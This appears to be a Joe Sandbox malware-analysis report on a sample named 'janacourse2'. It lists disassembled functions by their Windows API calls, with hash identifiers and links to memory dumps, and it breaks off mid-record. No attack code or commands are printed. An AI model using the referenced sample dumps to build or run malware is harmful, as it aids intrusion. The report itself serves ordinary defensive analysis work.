                                                                                                            • Opcode Fuzzy Hash: e63dd1efb1bcb47dff1a29c9cb463de81d1616b16e0ee74dbef4131b781ff3c7
                                                                                                            • Instruction Fuzzy Hash: 76F01D71543A12BBF7615B94EFC8AD67A25BF05702F401015F24250898C7BA9465CF90
                                                                                                            APIs
                                                                                                            • GetClientRect.USER32(?,?), ref: 00FB5D30
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00FB5D71
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00FB5D99
                                                                                                            • GetClientRect.USER32(?,?), ref: 00FB5ED7
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00FB5EF8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Client$Window$Screen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1296646539-0
                                                                                                            • Opcode ID: 185a1cbc7dafef6ca8e5a8c2efa35cfcc9d540cf5102014076cced287fb993f3
                                                                                                            • Instruction ID: a61f4db8e5ef0611802e10de6ee7052a5aa9b33c8682dea4ab61b376a9a1a522
                                                                                                            • Opcode Fuzzy Hash: 185a1cbc7dafef6ca8e5a8c2efa35cfcc9d540cf5102014076cced287fb993f3
                                                                                                            • Instruction Fuzzy Hash: 93B17839A0064ADBDB10CFA9C5807FAB7F1FF48310F14851AE8A9D7250DB38EA41EB54
                                                                                                            APIs
                                                                                                            • __allrem.LIBCMT ref: 00FE00BA
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE00D6
                                                                                                            • __allrem.LIBCMT ref: 00FE00ED
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE010B
                                                                                                            • __allrem.LIBCMT ref: 00FE0122
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE0140
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                            • String ID:
                                                                                                            • API String ID: 1992179935-0
                                                                                                            • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                                            • Instruction ID: 026ca594da2dcfc5d8aeb74fabaff42bb8d9d98c81d00ff72e2fe4ccdfb0df03
                                                                                                            • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                                            • Instruction Fuzzy Hash: 8481F872A007469BE7209F6ACC41B6B73E9AF41334F28463AF551DB3C1EBB8D944A750
                                                                                                            APIs
                                                                                                              • Part of subcall function 01033149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,0103101C,00000000,?,?,00000000), ref: 01033195
                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 01031DC0
                                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01031DE1
                                                                                                            • WSAGetLastError.WSOCK32 ref: 01031DF2
                                                                                                            • inet_ntoa.WSOCK32(?), ref: 01031E8C
                                                                                                            • htons.WSOCK32(?,?,?,?,?), ref: 01031EDB
                                                                                                            • _strlen.LIBCMT ref: 01031F35
                                                                                                              • Part of subcall function 010139E8: _strlen.LIBCMT ref: 010139F2
                                                                                                              • Part of subcall function 00FB6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00FCCF58,?,?,?), ref: 00FB6DBA
                                                                                                              • Part of subcall function 00FB6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00FCCF58,?,?,?), ref: 00FB6DED
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                                                            • String ID:
                                                                                                            • API String ID: 1923757996-0
                                                                                                            • Opcode ID: d5879adf7d8ba2677c33c94642827f9d08d9655f96518d4e5435b0920fa92d34
                                                                                                            • Instruction ID: 34d9d33825c85bf282a13c0a3d778b44c513832606a666ebd6a19247ea10bb58
                                                                                                            • Opcode Fuzzy Hash: d5879adf7d8ba2677c33c94642827f9d08d9655f96518d4e5435b0920fa92d34
                                                                                                            • Instruction Fuzzy Hash: 5CA1E130104301AFD324EF25C885F6A7BE9AFD8318F54898CF5965B2A2CB75ED46CB91
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00FD82D9,00FD82D9,?,?,?,00FE644F,00000001,00000001,8BE85006), ref: 00FE6258
                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00FE644F,00000001,00000001,8BE85006,?,?,?), ref: 00FE62DE
                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00FE63D8
                                                                                                            • __freea.LIBCMT ref: 00FE63E5
                                                                                                              • Part of subcall function 00FE3820: RtlAllocateHeap.NTDLL(00000000,?,01081444,?,00FCFDF5,?,?,00FBA976,00000010,01081440,00FB13FC,?,00FB13C6,?,00FB1129), ref: 00FE3852
                                                                                                            • __freea.LIBCMT ref: 00FE63EE
                                                                                                            • __freea.LIBCMT ref: 00FE6413
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1414292761-0
                                                                                                            • Opcode ID: d9aa46f1f7de38cbbe3f3915fe69d7ed673338f651c1c0efb217984722441edb
                                                                                                            • Instruction ID: faf0c06a8c78864d18544db5e14937253d1f64a9ca001dba26d767ceb54ff67a
                                                                                                            • Opcode Fuzzy Hash: d9aa46f1f7de38cbbe3f3915fe69d7ed673338f651c1c0efb217984722441edb
                                                                                                            • Instruction Fuzzy Hash: 6F51F572A0029AAFEF258F66CC81EAF77A9EF547A0F144229FD05D7240DB34DC40E660
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                              • Part of subcall function 0103C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0103B6AE,?,?), ref: 0103C9B5
                                                                                                              • Part of subcall function 0103C998: _wcslen.LIBCMT ref: 0103C9F1
                                                                                                              • Part of subcall function 0103C998: _wcslen.LIBCMT ref: 0103CA68
                                                                                                              • Part of subcall function 0103C998: _wcslen.LIBCMT ref: 0103CA9E
                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0103BCCA
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0103BD25
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0103BD6A
                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0103BD99
                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0103BDF3
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0103BDFF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 1120388591-0
                                                                                                            • Opcode ID: ba2876002bc1981a50d6085aeb3f8846b52158fa9b54654324649dcc6e45f921
                                                                                                            • Instruction ID: 2b0e30936de854faa575d7bb7fff38d4bae99d157c43865404b696fa122200e1
                                                                                                            • Opcode Fuzzy Hash: ba2876002bc1981a50d6085aeb3f8846b52158fa9b54654324649dcc6e45f921
                                                                                                            • Instruction Fuzzy Hash: 7081B570208241AFD714EF24C885E6ABBE9FF84308F14459DF5954B292DB35ED45CF92
                                                                                                            APIs
                                                                                                            • VariantInit.OLEAUT32(00000035), ref: 0100F7B9
                                                                                                            • SysAllocString.OLEAUT32(00000001), ref: 0100F860
                                                                                                            • VariantCopy.OLEAUT32(0100FA64,00000000), ref: 0100F889
                                                                                                            • VariantClear.OLEAUT32(0100FA64), ref: 0100F8AD
                                                                                                            • VariantCopy.OLEAUT32(0100FA64,00000000), ref: 0100F8B1
                                                                                                            • VariantClear.OLEAUT32(?), ref: 0100F8BB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                                                            • String ID:
                                                                                                            • API String ID: 3859894641-0
                                                                                                            • Opcode ID: d2cf85beb392c4c797557087cfd5e3c1ec051cdfe5f3d23246489d6cc95859da
                                                                                                            • Instruction ID: b8c252ba667cdc0c42d92e7b5ab9960f8fb49a9428a87acb589689e1a1c1ca6e
                                                                                                            • Opcode Fuzzy Hash: d2cf85beb392c4c797557087cfd5e3c1ec051cdfe5f3d23246489d6cc95859da
                                                                                                            • Instruction Fuzzy Hash: AC512435600312BBEF36AB65D885B6DB3E8EF45310F14845AE942DF2C5DB748840EBA7
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB7620: _wcslen.LIBCMT ref: 00FB7625
                                                                                                              • Part of subcall function 00FB6B57: _wcslen.LIBCMT ref: 00FB6B6A
                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 010294E5
                                                                                                            • _wcslen.LIBCMT ref: 01029506
                                                                                                            • _wcslen.LIBCMT ref: 0102952D
                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 01029585
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$FileName$OpenSave
                                                                                                            • String ID: X
                                                                                                            • API String ID: 83654149-3081909835
                                                                                                            • Opcode ID: 85321f1c72d79b7a408cf7ab6f9db316d5148c00f606da56c866609b75f83b29
                                                                                                            • Instruction ID: 000f5e559b08a338f50056a20ec1322aa5f8ddca5425870be2d4c7fa18a83911
                                                                                                            • Opcode Fuzzy Hash: 85321f1c72d79b7a408cf7ab6f9db316d5148c00f606da56c866609b75f83b29
                                                                                                            • Instruction Fuzzy Hash: 61E1B4716083218FD724DF25C881AAEB7E4BF85314F18856DF9899B2A2DB35DD04CF92
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FC9BB2
                                                                                                            • BeginPaint.USER32(?,?,?), ref: 00FC9241
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00FC92A5
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00FC92C2
                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FC92D3
                                                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 00FC9321
                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 010071EA
                                                                                                              • Part of subcall function 00FC9339: BeginPath.GDI32(00000000), ref: 00FC9357
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                            • String ID:
                                                                                                            • API String ID: 3050599898-0
                                                                                                            • Opcode ID: c46302045d1f4bb49cedd9a1fd13179838241d3ca5e478fa87909b980a1ba58e
                                                                                                            • Instruction ID: 7da136d0e22551f5e3423e744b74df9cbf48989d59b267dbd0ace3197f03934e
                                                                                                            • Opcode Fuzzy Hash: c46302045d1f4bb49cedd9a1fd13179838241d3ca5e478fa87909b980a1ba58e
                                                                                                            • Instruction Fuzzy Hash: D541A271109201AFE721DF18C989FAA7BA9FF45320F04066DF9D4871E1C77AA845EB61
                                                                                                            APIs
                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0102080C
                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 01020847
                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 01020863
                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 010208DC
                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 010208F3
                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 01020921
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                            • String ID:
                                                                                                            • API String ID: 3368777196-0
                                                                                                            • Opcode ID: dd5e477ba0af5de2c1d939ebf9aa07286cd98aaff8971b600b64f348115f28af
                                                                                                            • Instruction ID: c7f5e20f13c9c2346443fbf6fe2dfcf9a7c220c7ff622466f78f5baaff8db022
                                                                                                            • Opcode Fuzzy Hash: dd5e477ba0af5de2c1d939ebf9aa07286cd98aaff8971b600b64f348115f28af
                                                                                                            • Instruction Fuzzy Hash: 8C41CE71A00205EFEF14AF54DD81A6AB7B9FF04300F0480A9FD00AA29BDB75DE14DBA0
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0100F3AB,00000000,?,?,00000000,?,0100682C,00000004,00000000,00000000), ref: 0104824C
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 01048272
                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 010482D1
                                                                                                            • ShowWindow.USER32(00000000,00000004), ref: 010482E5
                                                                                                            • EnableWindow.USER32(00000000,00000001), ref: 0104830B
                                                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0104832F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 642888154-0
                                                                                                            • Opcode ID: fe1be939eb93577da544e9f1b8965cf32d664d639295ba260cd51e7d17e446ca
                                                                                                            • Instruction ID: 0665acbd40f1318a130acc5fa02f0a40509473ca6d30bf1dba349c34ac2a6c96
                                                                                                            • Opcode Fuzzy Hash: fe1be939eb93577da544e9f1b8965cf32d664d639295ba260cd51e7d17e446ca
                                                                                                            • Instruction Fuzzy Hash: 6141B7B4601644AFEB61CF58C6C9BE87BE0BF09715F1885F6E6D84B263C3366441CB50
                                                                                                            APIs
                                                                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 010322E8
                                                                                                              • Part of subcall function 0102E4EC: GetWindowRect.USER32(?,?), ref: 0102E504
                                                                                                            • GetDesktopWindow.USER32 ref: 01032312
                                                                                                            • GetWindowRect.USER32(00000000), ref: 01032319
                                                                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 01032355
                                                                                                            • GetCursorPos.USER32(?), ref: 01032381
                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 010323DF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                            • String ID:
                                                                                                            • API String ID: 2387181109-0
                                                                                                            • Opcode ID: b71f016fe205c505e3097a6ccf34b29de3fdb796ff9b0888a15d1410bcc73d40
                                                                                                            • Instruction ID: f296174905ce5a3d0fb34751efb2433791996f312031a76fde2f0c393be9c36a
                                                                                                            • Opcode Fuzzy Hash: b71f016fe205c505e3097a6ccf34b29de3fdb796ff9b0888a15d1410bcc73d40
                                                                                                            • Instruction Fuzzy Hash: C531CFB2505305ABD721DF18C944A9BBBEDFFC8310F004A19F9C597181DB35EA08CB92
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 01014C95
                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 01014CB2
                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 01014CEA
                                                                                                            • _wcslen.LIBCMT ref: 01014D08
                                                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 01014D10
                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 01014D1A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                            • String ID:
                                                                                                            • API String ID: 72514467-0
                                                                                                            • Opcode ID: 639d229ac0acf12b071a3e7cd7b0d82affc15c25de4ffbc2f8f0757fc53006c8
                                                                                                            • Instruction ID: 087dcd25107fb5444c78694dd6fb639438f68a6eacc45400183a5c746f6858c1
                                                                                                            • Opcode Fuzzy Hash: 639d229ac0acf12b071a3e7cd7b0d82affc15c25de4ffbc2f8f0757fc53006c8
                                                                                                            • Instruction Fuzzy Hash: C52149712042047BFB656B39AD49E7F7BDDDF49710F00806DF845CA1A6EB79D80093A0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB3A97,?,?,00FB2E7F,?,?,?,00000000), ref: 00FB3AC2
                                                                                                            • _wcslen.LIBCMT ref: 0102587B
                                                                                                            • CoInitialize.OLE32(00000000), ref: 01025995
                                                                                                            • CoCreateInstance.OLE32(0104FCF8,00000000,00000001,0104FB68,?), ref: 010259AE
                                                                                                            • CoUninitialize.OLE32 ref: 010259CC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
